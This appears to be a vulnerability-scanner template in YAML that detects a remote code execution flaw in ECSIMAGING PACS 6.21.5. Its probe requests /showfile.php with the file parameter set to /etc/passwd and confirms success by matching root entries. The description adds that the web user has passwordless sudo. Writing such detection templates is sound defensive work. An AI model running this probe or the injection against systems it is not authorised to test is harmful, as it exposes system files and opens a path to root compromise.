26 lines
719 B
YAML
26 lines
719 B
YAML
|
id: ecsimagingpacs-rce
|
||
|
|
||
|
info:
|
||
|
name: ECSIMAGING PACS 6.21.5 - Remote code execution
|
||
|
author: ritikchaddha
|
||
|
severity: critical
|
||
|
description: ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability. The parameter `file` on the webpage /showfile.php can be exploited with simple OS injection to gain root access. www-data user has sudo NOPASSWD access
|
||
|
reference: https://www.exploit-db.com/exploits/49388
|
||
|
tags: ecsimagingpacs,rce
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/showfile.php?file=/etc/passwd"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:.*:0:0:"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|